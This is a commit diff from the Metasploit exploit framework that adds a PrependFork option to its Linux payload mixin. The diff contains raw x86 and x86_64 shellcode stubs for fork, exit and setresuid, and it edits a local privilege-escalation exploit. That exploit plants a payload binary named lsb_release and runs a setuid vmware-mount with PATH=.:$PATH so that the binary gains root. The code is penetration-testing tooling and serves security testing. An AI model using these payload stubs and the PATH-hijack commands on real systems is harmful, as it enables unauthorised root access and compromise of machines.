Land #2325, @jlee-r7's Linux PrependFork addition
jvazquez-r7
commit
206b52ea30
|
|
@ -19,6 +19,13 @@ module Msf::Payload::Linux
|
||||||
|
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
|
Msf::OptBool.new('PrependFork',
|
||||||
|
[
|
||||||
|
false,
|
||||||
|
"Prepend a stub that executes: if (fork()) { exit(0); }",
|
||||||
|
"false"
|
||||||
|
]
|
||||||
|
),
|
||||||
Msf::OptBool.new('PrependSetresuid',
|
Msf::OptBool.new('PrependSetresuid',
|
||||||
[
|
[
|
||||||
false,
|
false,
|
||||||
|
|
@ -97,6 +104,17 @@ module Msf::Payload::Linux
|
||||||
|
|
||||||
# Prepend
|
# Prepend
|
||||||
|
|
||||||
|
if (datastore['PrependFork'])
|
||||||
|
pre << "\x6a\x02" +# pushb $0x2 #
|
||||||
|
"\x58" +# popl %eax #
|
||||||
|
"\xcd\x80" +# int $0x80 ; fork #
|
||||||
|
"\x85\xc0" +# test %eax,%eax #
|
||||||
|
"\x74\x06" +# jz 0xf #
|
||||||
|
"\x31\xc0" +# xor %eax,%eax #
|
||||||
|
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||||
|
"\xcd\x80" # int $0x80 #
|
||||||
|
end
|
||||||
|
|
||||||
if (datastore['PrependSetresuid'])
|
if (datastore['PrependSetresuid'])
|
||||||
# setresuid(0, 0, 0)
|
# setresuid(0, 0, 0)
|
||||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||||
|
|
@ -197,10 +215,8 @@ module Msf::Payload::Linux
|
||||||
"\xcd\x80" # int $0x80 #
|
"\xcd\x80" # int $0x80 #
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
# Handle all Power/CBEA code here
|
# Handle all Power/CBEA code here
|
||||||
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||||
|
|
||||||
# Prepend
|
# Prepend
|
||||||
|
|
||||||
|
|
@ -277,9 +293,21 @@ module Msf::Payload::Linux
|
||||||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||||
"\x44\xff\xff\x02" # sc #
|
"\x44\xff\xff\x02" # sc #
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
if (test_arch.include?(ARCH_X86_64))
|
elsif (test_arch.include?(ARCH_X86_64))
|
||||||
|
|
||||||
|
if (datastore['PrependFork'])
|
||||||
|
# if (fork()) { exit(0); }
|
||||||
|
pre << "\x6a\x39" # push 57 ; __NR_fork #
|
||||||
|
pre << "\x58" # pop rax #
|
||||||
|
pre << "\x0f\x05" # syscall #
|
||||||
|
pre << "\x48\x85\xc0" # test rax,rax #
|
||||||
|
pre << "\x74\x08" # jz 0x08 #
|
||||||
|
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||||
|
pre << "\x6a\x3c" # push 60 ; __NR_exit #
|
||||||
|
pre << "\x58" # pop rax #
|
||||||
|
pre << "\x0f\x05" # syscall #
|
||||||
|
end
|
||||||
|
|
||||||
if (datastore['PrependSetresuid'])
|
if (datastore['PrependSetresuid'])
|
||||||
# setresuid(0, 0, 0)
|
# setresuid(0, 0, 0)
|
||||||
|
|
@ -389,8 +417,8 @@ module Msf::Payload::Linux
|
||||||
# Append exit(0)
|
# Append exit(0)
|
||||||
if (datastore['AppendExit'])
|
if (datastore['AppendExit'])
|
||||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||||
pre << "\x6a\x3c" # push 0x53 #
|
app << "\x6a\x3c" # push 0x3c #
|
||||||
pre << "\x58" # pop rax #
|
app << "\x58" # pop rax #
|
||||||
app << "\x0f\x05" # syscall #
|
app << "\x0f\x05" # syscall #
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
|
|
@ -43,6 +43,7 @@ class Metasploit4 < Msf::Exploit::Local
|
||||||
'DefaultOptions' => {
|
'DefaultOptions' => {
|
||||||
"PrependSetresuid" => true,
|
"PrependSetresuid" => true,
|
||||||
"PrependSetresgid" => true,
|
"PrependSetresgid" => true,
|
||||||
|
"PrependFork" => true,
|
||||||
},
|
},
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
|
@ -56,8 +57,6 @@ class Metasploit4 < Msf::Exploit::Local
|
||||||
'DisclosureDate' => "Aug 22 2013"
|
'DisclosureDate' => "Aug 22 2013"
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
# Handled by ghetto hardcoding below.
|
|
||||||
deregister_options("PrependFork")
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
@ -73,22 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
||||||
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Ghetto PrependFork action which is apparently only implemented for
|
write_file("lsb_release", generate_payload_exe)
|
||||||
# Meterpreter.
|
|
||||||
# XXX Put this in a mixin somewhere
|
|
||||||
# if(fork()) exit(0);
|
|
||||||
# 6A02 push byte +0x2
|
|
||||||
# 58 pop eax
|
|
||||||
# CD80 int 0x80 ; fork
|
|
||||||
# 85C0 test eax,eax
|
|
||||||
# 7406 jz 0xf
|
|
||||||
# 31C0 xor eax,eax
|
|
||||||
# B001 mov al,0x1
|
|
||||||
# CD80 int 0x80 ; exit
|
|
||||||
exe = generate_payload_exe(
|
|
||||||
:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
|
|
||||||
)
|
|
||||||
write_file("lsb_release", exe)
|
|
||||||
|
|
||||||
cmd_exec("chmod +x lsb_release")
|
cmd_exec("chmod +x lsb_release")
|
||||||
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
||||||
|
|
|
||||||
|
|
@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell'
|
||||||
require 'msf/base/sessions/command_shell_options'
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
include Msf::Payload::Linux
|
||||||
include Msf::Sessions::CommandShellOptions
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
|
|
||||||
|
|
@ -24,7 +24,6 @@ module Metasploit3
|
||||||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptBool.new('PrependFork', [ false, "Add a fork() / exit_group() (for parent) code" ]),
|
|
||||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
@ -71,21 +70,6 @@ module Metasploit3
|
||||||
|
|
||||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||||
|
|
||||||
if(datastore['PrependFork'])
|
|
||||||
# fork() / parent does exit()
|
|
||||||
|
|
||||||
# If the target process is threaded, this means the thread
|
|
||||||
# will exit. exit_group() will try to close the process down
|
|
||||||
# completely.. and if we do that, it may not be reaped
|
|
||||||
# correctly.
|
|
||||||
#
|
|
||||||
# Plus, depending on the vuln, we might get multiple shots at
|
|
||||||
# owning a finite amount of threads.
|
|
||||||
|
|
||||||
midstager <<
|
|
||||||
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80"
|
|
||||||
end
|
|
||||||
|
|
||||||
midstager <<
|
midstager <<
|
||||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||||
|
|
|
||||||
|
|
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
|
||||||
require 'msf/base/sessions/command_shell_options'
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
include Msf::Payload::Linux
|
||||||
include Msf::Sessions::CommandShellOptions
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue